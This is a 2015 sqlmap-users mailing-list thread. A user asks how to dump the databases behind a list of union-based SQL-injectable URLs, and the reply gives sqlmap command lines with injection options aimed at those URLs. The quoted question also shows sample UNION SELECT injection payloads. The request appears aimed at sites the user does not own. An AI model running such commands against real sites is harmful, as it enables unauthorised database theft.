Re: [sqlmap-users] Dump database by injected url, without finding column
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Dump database by injected url, without finding column
|
From: Miroslav S. <mir...@gm...> - 2015-10-07 09:06:02
|
sqlmap has to find a SQLi. It can't just dump data without knowing anything about the SQLi. Every SQLi technique has different rules for data dumping. I would suggest that you run (if you want to be stricter with your given cases): python sqlmap.py -u "http://hello.com/index.php?id=1" --technique=BU --prefix="" --suffix="-- -" --union-cols=5 python sqlmap.py -u "http://world.com/index.php?page=3" --technique=BU --prefix="" --suffix="-- -" --union-cols=5 Bye On Wed, Oct 7, 2015 at 11:47 AM, bogdan <bog...@ou...> wrote: > Hello! > > I have a list of vulners UnionBased urls(example): > > http://hello.com/index.php?id=-1+and+union+all+select+1,2,3,[point],4,5-- > http://world.com/index.php?page=3+and+union+all+select+1,2,3,4,[point]-- > > How can i to load one url of this list to sqlmap and dumping structure > of database, without finding injecting point? > > Sorry, for my bad English, and Thanks! > > > ------------------------------------------------------------------------------ > Full-scale, agent-less Infrastructure Monitoring from a single dashboard > Integrate with 40+ ManageEngine ITSM Solutions for complete visibility > Physical-Virtual-Cloud Infrastructure monitoring from one console > Real user monitoring with APM Insights and performance trend reports > Learn More > http://pubads.g.doubleclick.net/gampad/clk?id=247754911&iu=/4140 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
